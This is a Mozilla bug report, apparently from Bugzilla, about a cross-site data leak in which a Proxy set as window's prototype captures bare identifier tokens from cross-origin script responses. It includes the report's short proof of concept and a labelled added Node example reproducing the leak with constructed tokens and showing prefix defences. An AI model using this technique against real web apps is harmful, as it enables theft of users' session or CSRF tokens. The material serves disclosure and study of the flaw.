Closed Bug 1099081 Opened 10 years ago Closed 10 years ago

Cross-site data leak using window.__proto__ = new Proxy

Categories: Core :: Security, defect
Priority: Not set
Severity: normal
Status: RESOLVED DUPLICATE of bug 1048535
Reporter: till; Assignee: Unassigned
Keywords: sec-moderate, wsec-disclosure

By setting window.__proto__, it's possible to intercept data from other domains as long as the data consists of either a single token that's a valid JS identifier, or a list of such tokens.

See https://twitter.com/steike/status/533198334547468288 for a POC.

It's actually even simpler to implement this using ES6-style proxies:

window.__proto__ = new Proxy({}, {
    // Every bare identifier the cross-origin script resolves arrives here as `name`.
    get: function(target, name) { console.log(name); return true; },
    // Claim a binding for every name so the lookup never falls through to a ReferenceError.
    has: function(target, name) { return true; }
});

Examples of request results this works for:
"foo05120820e156c2f445f670759be64420" (from the original POC)
"foo,bar"
"foo,
bar,
baz"
"foo;bar"

Calling this sec-moderate (maybe even sec-low?), because it relies on a web app that is not securing its "secret tokens" in a best-practice way.

Dan, can you think of something we could do about this?
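Added example, not part of the bug report and not Firefox code: the interception described above, reproduced offline. Current browsers make window an immutable-prototype object, so window.__proto__ = new Proxy(...) no longer takes effect there; the example therefore uses Node's globalThis, whose prototype can still be replaced. It installs the same get/has traps, evaluates a constructed "cross-origin response" with indirect eval (standing in for a <script src=...> include), restores the prototype, and returns the identifiers the trap saw. The sample bodies are constructed, modelled on the shapes listed above, plus two bodies that do not parse as a script (an anti-hijacking prefix and a JSON object literal), which show the app-side practice the sec-moderate rating assumes is missing. The function and sample names are this example's own.

```javascript
// Added example, not code from the bug report or from Firefox.
// Reproduces the leak offline: the global object's prototype is replaced by a
// Proxy (globalThis stands in for window, which current browsers protect),
// then a constructed "cross-origin response" is evaluated as a classic script
// and every identifier the script resolves is recorded.

// Evaluate `body` as a global script with the trapping Proxy installed and
// return the identifier names the Proxy's get trap observed. The original
// prototype is restored in `finally` so nothing else in the process is affected.
function leakIdentifiers(body) {
  const seen = [];
  const trap = new Proxy({}, {
    // Claim a binding for every name, so a lookup never becomes a ReferenceError.
    has() { return true; },
    // Each bare identifier the response resolves arrives here as `name`.
    get(_target, name) {
      if (typeof name === 'string') seen.push(name);
      return true; // harmless value; keeps expressions like `foo,bar` running
    },
  });
  const originalProto = Object.getPrototypeOf(globalThis);
  Object.setPrototypeOf(globalThis, trap);
  try {
    (0, eval)(body); // indirect eval: global scope, like <script src=...>
    return { leaked: seen, error: null };
  } catch (e) {
    // A parse error means nothing was resolved: `seen` stays empty.
    return { leaked: seen, error: e.name };
  } finally {
    Object.setPrototypeOf(globalThis, originalProto);
  }
}

// Constructed sample response bodies (not real traffic), modelled on the
// shapes listed in the report, plus two bodies that do not parse as a script.
const SAMPLE_RESPONSES = {
  singleToken: 'foo05120820e156c2f445f670759be64420',
  commaList: 'foo,bar',
  multiLine: 'foo,\nbar,\nbaz',
  semicolons: 'foo;bar',
  // Anti-hijacking prefix: the parser fails on ")" before resolving anything.
  prefixed: ")]}',\nfoo05120820e156c2f445f670759be64420",
  // A JSON object literal: "{" opens a block, so "token": is a syntax error.
  jsonObject: '{"token":"foo05120820e156c2f445f670759be64420"}',
};

// Run every sample and report what leaked (or why parsing stopped).
function demo() {
  const results = {};
  for (const [label, body] of Object.entries(SAMPLE_RESPONSES)) {
    results[label] = leakIdentifiers(body);
  }
  return results;
}

console.log(JSON.stringify(demo(), null, 2));
```

The names are collected from the get trap; whether an engine consults has first (as the spec's HasProperty step does) varies, so the has trap is kept only so that engines which do check never fall through to a ReferenceError. Note that only the identifier names leak, not the values of the parsed tokens, which is exactly what makes bare-token responses (session or CSRF tokens served as a single identifier or a comma list) the affected shape.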
Status: NEW → RESOLVED
Closed: 10 years ago
Resolution: --- → DUPLICATE
This bug has been marked as a duplicate of a restricted bug.
If it's an exact duplicate, we should consider opening up bug 1048535.